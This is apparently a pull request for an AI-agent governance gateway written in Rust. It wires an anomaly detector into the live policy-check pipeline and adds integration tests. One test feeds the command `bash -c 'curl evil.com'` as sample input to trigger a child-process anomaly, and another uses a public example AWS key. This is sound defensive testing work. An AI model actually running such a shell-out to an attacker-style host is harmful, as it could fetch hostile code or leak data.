### PR TITLE
[AAASM-3378] 🐛 (aa-gateway): Wire AnomalyDetector into the live pipeline

### DIFF
--- a/aa-gateway/src/engine/mod.rs
+++ b/aa-gateway/src/engine/mod.rs
@@ -1273,6 +1273,21 @@ impl PolicyEngine {
         Arc::clone(&self.budget)
     }
 
+    /// Return the primary policy's network allowlist (bare hosts).
+    ///
+    /// Used by the anomaly detector's unknown-external-connection check
+    /// (AAASM-3378) so it can flag `NetworkRequest`s to hosts outside the
+    /// configured allowlist. An empty result means no allowlist is configured
+    /// (open network policy) and the detector treats every host as allowed.
+    pub fn network_allowlist(&self) -> Vec<String> {
+        self.policy
+            .load()
+            .network
+            .as_ref()
+            .map(|np| np.allowlist.clone())
+            .unwrap_or_default()
+    }
+
     /// Return per-policy approval escalation overrides from the primary policy.
     ///
     /// Returns `(escalation_timeout_seconds_override, escalation_role_override)`.

--- a/aa-gateway/src/service/policy_service.rs
+++ b/aa-gateway/src/service/policy_service.rs
@@ -23,6 +23,7 @@ use aa_security::Redaction;
 use aa_runtime::approval::{ApprovalQueue, ApprovalRequest};
 
 use crate::alerts::SecretAlert;
+use crate::anomaly::{AnomalyDetector, AnomalyEvent, AnomalyResponder};
 use crate::approval::db_escalation_scheduler::DbEscalationScheduler;
 use crate::approval::escalation::EscalationScheduler;
 use crate::approval::router::ApprovalRouter;
@@ -34,6 +35,32 @@ use crate::ops::{OpsRegistry, SharedOpControlPublisher};
 use crate::registry::convert::proto_agent_id_to_key;
 use crate::registry::{AgentRegistry, SuspendReason};
 use crate::service::convert;
+
+/// Live anomaly-detection wiring for the `CheckAction` / `BatchCheck` flow
+/// (AAASM-3378).
+///
+/// The `aa-gateway::anomaly` engine was fully implemented and unit-tested but
+/// had zero non-test instantiations — it never ran against live traffic, so no
+/// `AnomalyEvent` could ever fire at runtime. This hook feeds every evaluated
+/// action through [`AnomalyDetector::detect`] and runs [`AnomalyResponder`] on
+/// any detection, broadcasting the resulting [`AnomalyEvent`] to subscribers.
+#[derive(Clone)]
+pub struct AnomalyHook {
+    detector: Arc<AnomalyDetector>,
+    event_tx: broadcast::Sender<AnomalyEvent>,
+}
+
+impl AnomalyHook {
+    /// Build a hook around the given detector and event broadcast sender.
+    pub fn new(detector: Arc<AnomalyDetector>, event_tx: broadcast::Sender<AnomalyEvent>) -> Self {
+        Self { detector, event_tx }
+    }
+
+    /// Shared handle to the underlying detector (for stateful checks/tests).
+    pub fn detector(&self) -> Arc<AnomalyDetector> {
+        Arc::clone(&self.detector)
+    }
+}
 
 /// gRPC service implementation wiring `CheckAction` / `BatchCheck` to [`PolicyEngine`].
 pub struct PolicyServiceImpl {
@@ -65,6 +92,12 @@ pub struct PolicyServiceImpl {
     /// new subscriptions with `Unavailable`. PR-H will pair this with
     /// `OpsRegistry` transition call sites that drive `publish()`.
     ops_publisher: Option<SharedOpControlPublisher>,
+    /// Optional live anomaly-detection hook (AAASM-3378). When set, every
+    /// `check_action` / `batch_check` evaluation is run through the anomaly
+    /// detector and any detection triggers the responder + an `AnomalyEvent`
+    /// broadcast. `None` disables detection — the default for unit tests and
+    /// any caller that does not opt in via [`with_anomaly_detection`].
+    anomaly: Option<AnomalyHook>,
 }
 
 impl PolicyServiceImpl {
@@ -94,6 +127,7 @@ impl PolicyServiceImpl {
             secret_alert_tx: None,
             ops_registry: None,
             ops_publisher: None,
+            anomaly: None,
         }
     }
 
@@ -123,6 +157,7 @@ impl PolicyServiceImpl {
             secret_alert_tx: None,
             ops_registry: None,
             ops_publisher: None,
+            anomaly: None,
         }
     }
 
@@ -154,6 +189,7 @@ impl PolicyServiceImpl {
             secret_alert_tx: None,
             ops_registry: None,
             ops_publisher: None,
+            anomaly: None,
         }
     }
 
@@ -190,6 +226,7 @@ impl PolicyServiceImpl {
             secret_alert_tx: None,
             ops_registry: None,
             ops_publisher: None,
+            anomaly: None,
         }
     }
 
@@ -259,6 +296,23 @@ impl PolicyServiceImpl {
     /// [`OpControlPublisher`]: crate::ops::OpControlPublisher
     pub fn with_ops_publisher(mut self, publisher: SharedOpControlPublisher) -> Self {
         self.ops_publisher = Some(publisher);
+        self
+    }
+
+    /// Attach a live anomaly-detection hook (AAASM-3378).
+    ///
+    /// Wires the previously-unwired `aa-gateway::anomaly` engine into the live
+    /// `check_action` / `batch_check` path. With a hook attached, every
+    /// evaluated action updates the per-agent behavioral baseline, runs through
+    /// [`AnomalyDetector::detect`], and — on a detection — executes
+    /// [`AnomalyResponder::respond`] and broadcasts the resulting
+    /// [`AnomalyEvent`]. Without a hook, behavior is unchanged.
+    pub fn with_anomaly_detection(
+        mut self,
+        detector: Arc<AnomalyDetector>,
+        event_tx: broadcast::Sender<AnomalyEvent>,
+    ) -> Self {
+        self.anomaly = Some(AnomalyHook::new(detector, event_tx));
         self
     }
 
@@ -1082,6 +1136,59 @@ impl PolicyServiceImpl {
         }
     }
 
+    /// AAASM-3378 — run the live anomaly detector over an evaluated action.
+    ///
+    /// This is the wiring that the previously-unwired `aa-gateway::anomaly`
+    /// engine was missing: the detector had a full API + unit tests but **no
+    /// non-test caller**, so no `AnomalyEvent` could ever fire at runtime.
+    ///
+    /// Behaviour (no-op when no hook is attached):
+    /// 1. Rebuild the core `(ctx, action)` from the request.
+    /// 2. Update the per-agent baseline (`record_action`, and for tool calls
+    ///    `record_tool_call`; one `record_credential_finding` per credential
+    ///    finding the evaluation surfaced).
+    /// 3. Run [`AnomalyDetector::detect`] with `has_pii` derived from the
+    ///    evaluation's credential findings and the policy network allowlist.
+    /// 4. On a detection, execute [`AnomalyResponder::respond`] (logs the
+    ///    response action) and broadcast the [`AnomalyEvent`] so subscribers
+    ///    (and tests) observe the live detection.
+    fn maybe_detect_anomaly(&self, req: &CheckActionRequest, eval: &EvaluationResult) {
+        let Some(hook) = self.anomaly.as_ref() else {
+            return;
+        };
+        let (ctx, action) = match convert::request_to_core(req) {
+            Ok(pair) => pair,
+            Err(e) => {
+                tracing::warn!(error = %e, "failed to rebuild ctx for anomaly detection");
+                return;
+            }
+        };
+        let agent_id = ctx.agent_id;
+        let now_ms = SystemTime::now()
+            .duration_since(SystemTime::UNIX_EPOCH)
+            .map(|d| d.as_millis() as u64)
+            .unwrap_or(0);
+
+        // Update the behavioral baseline before detection so spike / loop
+        // checks see the current action.
+        hook.detector.record_action(agent_id, now_ms);
+        if let aa_core::GovernanceAction::ToolCall { name, args } = &action {
+            hook.detector.record_tool_call(agent_id, name, args, now_ms);
+        }
+        for _ in 0..eval.credential_findings.len() {
+            hook.detector.record_credential_finding(agent_id);
+        }
+
+        let has_pii = !eval.credential_findings.is_empty();
+        let allowlist = self.engine.network_allowlist();
+        if let Some(event) = hook.detector.detect(agent_id, &action, has_pii, &allowlist, None) {
+            AnomalyResponder::respond(&event);
+            if let Err(err) = hook.event_tx.send(event) {
+                tracing::trace!(error = %err, "no subscribers for AnomalyEvent broadcast");
+            }
+        }
+    }
+
     /// Compose the live-ops registry id and ingest if a registry is attached.
     ///
     /// Returns `Some(op_id)` when ingestion happened so the caller can drive
@@ -1227,6 +1334,9 @@ impl PolicyService for PolicyServiceImpl {
         // AAASM-3353: accrue LLM-call cost so daily / monthly budget limits fire.
         self.maybe_accrue_llm_spend(&req, &response);
 
+        // AAASM-3378: run the live anomaly detector over the evaluated action.
+        self.maybe_detect_anomaly(&req, &eval);
+
         // Fire-and-forget audit entry — never blocks the response.
         self.record_audit(&req, &response, &eval, shadow_event.as_ref()).await;
 
@@ -1259,6 +1369,8 @@ impl PolicyService for PolicyServiceImpl {
             self.maybe_suspend_agent(req, deny_action).await;
             // AAASM-3353: accrue LLM-call cost so budget limits fire in batch mode too.
             self.maybe_accrue_llm_spend(req, &resp);
+            // AAASM-3378: run the live anomaly detector in batch mode too.
+            self.maybe_detect_anomaly(req, &eval);
             self.record_audit(req, &resp, &eval, shadow_event.as_ref()).await;
             responses.push(resp);
         }

--- a/aa-gateway/tests/policy_service_anomaly_test.rs
+++ b/aa-gateway/tests/policy_service_anomaly_test.rs
@@ -1,0 +1,178 @@
+//! AAASM-3378 — the `aa-gateway::anomaly` engine is wired into the live
+//! `check_action` path, so a triggering pattern actually produces an
+//! `AnomalyEvent` at runtime.
+//!
+//! The detector was fully implemented and unit-tested but had zero non-test
+//! callers, so before this wiring no `AnomalyEvent` could ever fire on live
+//! traffic. These tests drive `check_action` on the trait impl (no tonic
+//! server / network port needed) with a detector + event broadcast attached
+//! via `with_anomaly_detection`, and assert the event arrives on the channel.
+//!
+//! Synthetic secrets only — `AKIAIOSFODNN7EXAMPLE` is a public AWS
+//! documentation key, never a live credential.
+
+use std::io::Write;
+use std::sync::atomic::AtomicU64;
+use std::sync::Arc;
+use std::time::Duration;
+
+use aa_gateway::anomaly::{AnomalyConfig, AnomalyDetector, AnomalyEvent, AnomalyType};
+use aa_gateway::service::PolicyServiceImpl;
+use aa_gateway::PolicyEngine;
+use aa_proto::assembly::common::v1::{ActionType, AgentId as ProtoAgentId};
+use aa_proto::assembly::policy::v1::policy_service_server::PolicyService;
+use aa_proto::assembly::policy::v1::{
+    action_context::Action, ActionContext, CheckActionRequest, ProcessExecContext, ToolCallContext,
+};
+use tonic::Request;
+
+const ALLOW_TEST_TOOL_POLICY: &str = r#"
+version: "1"
+tools:
+  test_tool:
+    allow: true
+"#;
+
+const FAKE_AWS_ACCESS_KEY: &str = "AKIAIOSFODNN7EXAMPLE";
+
+/// Build a service with an anomaly detector + event broadcast attached.
+/// `cred_threshold` tunes the credential-leak detection threshold.
+fn make_service_with_anomaly(
+    cred_threshold: u32,
+) -> (Arc<PolicyServiceImpl>, tokio::sync::broadcast::Receiver<AnomalyEvent>) {
+    let mut tmp = tempfile::NamedTempFile::new().unwrap();
+    write!(tmp, "{}", ALLOW_TEST_TOOL_POLICY).unwrap();
+    tmp.flush().unwrap();
+
+    let (budget_tx, _) = tokio::sync::broadcast::channel::<aa_gateway::budget::BudgetAlert>(64);
+    let engine = PolicyEngine::load_from_file(tmp.path(), budget_tx).unwrap();
+
+    let (audit_tx, _audit_rx) = tokio::sync::mpsc::channel(4096);
+    let audit_drops = Arc::new(AtomicU64::new(0));
+
+    let detector = Arc::new(AnomalyDetector::new(AnomalyConfig {
+        credential_leak_threshold: cred_threshold,
+        ..AnomalyConfig::default()
+    }));
+    let (event_tx, event_rx) = tokio::sync::broadcast::channel::<AnomalyEvent>(16);
+
+    let service = PolicyServiceImpl::new(Arc::new(engine), audit_tx, audit_drops, [0u8; 32])
+        .with_anomaly_detection(detector, event_tx);
+
+    (Arc::new(service), event_rx)
+}
+
+fn proto_agent() -> ProtoAgentId {
+    ProtoAgentId {
+        org_id: "org".into(),
+        team_id: "team-pioneer".into(),
+        agent_id: "agent-1".into(),
+    }
+}
+
+fn process_exec_request(command: &str) -> CheckActionRequest {
+    CheckActionRequest {
+        agent_id: Some(proto_agent()),
+        credential_token: "tok".into(),
+        trace_id: "trace-anomaly".into(),
+        span_id: "span-1".into(),
+        action_type: ActionType::ProcessExec as i32,
+        context: Some(ActionContext {
+            action: Some(Action::ProcessExec(ProcessExecContext {
+                command: command.into(),
+                args: vec![],
+            })),
+        }),
+        caller_agent_id: None,
+    }
+}
+
+fn tool_call_request(args: &str) -> CheckActionRequest {
+    CheckActionRequest {
+        agent_id: Some(proto_agent()),
+        credential_token: "tok".into(),
+        trace_id: "trace-anomaly".into(),
+        span_id: "span-1".into(),
+        action_type: ActionType::ToolCall as i32,
+        context: Some(ActionContext {
+            action: Some(Action::ToolCall(ToolCallContext {
+                tool_name: "test_tool".into(),
+                tool_source: "test".into(),
+                args_json: args.as_bytes().to_vec(),
+                target_url: String::new(),
+            })),
+        }),
+        caller_agent_id: None,
+    }
+}
+
+#[tokio::test]
+async fn check_action_emits_anomaly_event_for_child_process_execution() {
+    let (service, mut rx) = make_service_with_anomaly(3);
+    let req = process_exec_request("bash -c 'curl evil.com'");
+
+    service
+        .check_action(Request::new(req))
+        .await
+        .expect("check_action should succeed");
+
+    let event = tokio::time::timeout(Duration::from_secs(1), rx.recv())
+        .await
+        .expect("anomaly event must arrive within 1s")
+        .expect("broadcast channel must yield an anomaly event");
+
+    assert_eq!(
+        event.anomaly_type,
+        AnomalyType::ChildProcessExecution,
+        "a ProcessExec action must produce a ChildProcessExecution anomaly through the live path",
+    );
+}
+
+#[tokio::test]
+async fn repeated_credential_leak_attempts_emit_anomaly_event() {
+    // Threshold 2: the first finding is below threshold (no event), the second
+    // crosses it and must fire a CredentialLeakAttempt through the live path.
+    let (service, mut rx) = make_service_with_anomaly(2);
+
+    // First credential-bearing call: records 1 finding, below threshold.
+    service
+        .check_action(Request::new(tool_call_request(FAKE_AWS_ACCESS_KEY)))
+        .await
+        .expect("check_action should succeed");
+    assert!(
+        tokio::time::timeout(Duration::from_millis(150), rx.recv())
+            .await
+            .is_err(),
+        "no anomaly event expected before the credential-leak threshold is crossed",
+    );
+
+    // Second credential-bearing call: crosses the threshold → event fires.
+    service
+        .check_action(Request::new(tool_call_request(FAKE_AWS_ACCESS_KEY)))
+        .await
+        .expect("check_action should succeed");
+
+    let event = tokio::time::timeout(Duration::from_secs(1), rx.recv())
+        .await
+        .expect("anomaly event must arrive within 1s")
+        .expect("broadcast channel must yield an anomaly event");
+
+    assert_eq!(
+        event.anomaly_type,
+        AnomalyType::CredentialLeakAttempt,
+        "repeated credential findings must produce a CredentialLeakAttempt anomaly",
+    );
+}
+
+#[tokio::test]
+async fn clean_tool_call_emits_no_anomaly_event() {
+    let (service, mut rx) = make_service_with_anomaly(3);
+
+    service
+        .check_action(Request::new(tool_call_request(r#"{"q":"hello"}"#)))
+        .await
+        .expect("check_action should succeed");
+
+    let outcome = tokio::time::timeout(Duration::from_millis(150), rx.recv()).await;
+    assert!(outcome.is_err(), "no anomaly event expected for a clean tool call");
+}


### PR DESCRIPTION
## Description

The `aa-gateway::anomaly` engine (detector for behavior-spike, credential-leak,
child-process-execution, unknown-connection, data-exfiltration, loop-runaway and
identity-spoofing, plus a responder) was fully implemented and unit-tested but
had **zero non-test instantiations** — it was never wired into the live gateway
pipeline, so no `AnomalyEvent` / alert could ever fire at runtime. A fully-built
governance feature that did nothing (same class as the earlier budget-unwired bug).

This PR wires the detector + responder into the live `CheckAction` / `BatchCheck`
flow:

- New `PolicyEngine::network_allowlist()` accessor exposes the primary policy's
  network allowlist for the detector's unknown-external-connection check.
- New optional `AnomalyHook` (detector + `AnomalyEvent` broadcast sender) on
  `PolicyServiceImpl`, opt-in via a `with_anomaly_detection(...)` builder
  (mirrors the existing `with_secret_alert_tx` pattern). `None` = unchanged behaviour.
- On every live evaluation, `maybe_detect_anomaly` updates the per-agent baseline
  (`record_action`, `record_tool_call`, one `record_credential_finding` per
  credential finding the evaluation surfaced), runs `AnomalyDetector::detect`
  (`has_pii` derived from credential findings, allowlist from policy), and on a
  detection executes `AnomalyResponder::respond` (logs the response action) and
  broadcasts the `AnomalyEvent` so subscribers observe the live detection.

## Type of Change

- [x] 🐛 Bug fix

## Breaking Changes

- [x] No

(Additive: one new public engine accessor + one new builder + one new optional
field defaulting to `None`. All existing constructors/callers are unchanged.)

## Related Issues

- Related Jira ticket: AAASM-3378

## Integration seam (and why)

Hooked at a **non-conflicting** seam: `maybe_detect_anomaly` is called from
`check_action` / `batch_check` next to the existing `maybe_accrue_llm_spend`
call site, **not** the audit-construction block (`record_audit` / the
`AuditEntry` builder). A concurrent PR (AAASM-3376/3377) is editing that
audit-construction block in `policy_service.rs`; this change deliberately stays
out of it. The only `policy_service.rs` edits are: imports, a new struct + field
(`anomaly: None` added uniformly to the 4 constructors), a new builder, a new
helper, and two single-line call sites — all separate from the audit block.

## Assumptions / follow-ups

- The detector currently runs over the **primary** policy's network allowlist;
  cascade-scoped allowlist resolution for the unknown-connection check is a
  follow-up (the detection still works for the common single-policy case).
- `credential_owner_id` for the identity-spoofing check is passed as `None` (the
  credential owner is not surfaced on the pre-execution `CheckAction` request);
  wiring that source is a follow-up. All other anomaly types are live.
- Detection emits/logs + broadcasts; converting an anomaly response
  (Pause/Block/Quarantine) into an enforcement decision on the response itself is
  intentionally out of scope (matches the responder's documented TODO for
  registry actions / event-bus alerts).

## Testing

- [x] Unit tests added / updated
- [x] Integration tests added / updated

New `aa-gateway/tests/policy_service_anomaly_test.rs` drives `check_action` on
the trait impl with a detector + event broadcast attached and asserts a
triggering pattern actually produces an `AnomalyEvent` through the live path:
- a `ProcessExec` action → `ChildProcessExecution` event;
- repeated credential findings → `CredentialLeakAttempt` once the threshold is
  crossed (and nothing before it);
- a clean tool call → no event.

How to verify:

```
export CARGO_TARGET_DIR=/tmp/aa-gw-tB
cargo build -p aa-gateway
cargo nextest run -p aa-gateway        # 1134 passed, 0 skipped
cargo clippy -p aa-gateway --all-targets   # clean
cargo fmt -p aa-gateway
```

Reference: QA evidence under
`agent-assembly-integration-tests/verification-reports/base-branch-2026-06/`.

## Checklist

- [x] Code follows project style guidelines (`cargo fmt`, `cargo clippy`)
- [x] Self-review of the diff completed
- [x] Documentation updated if behaviour changed (doc comments on new items)
- [ ] All CI checks passing
- [x] Commits are small and follow the Gitmoji convention

Closes AAASM-3378
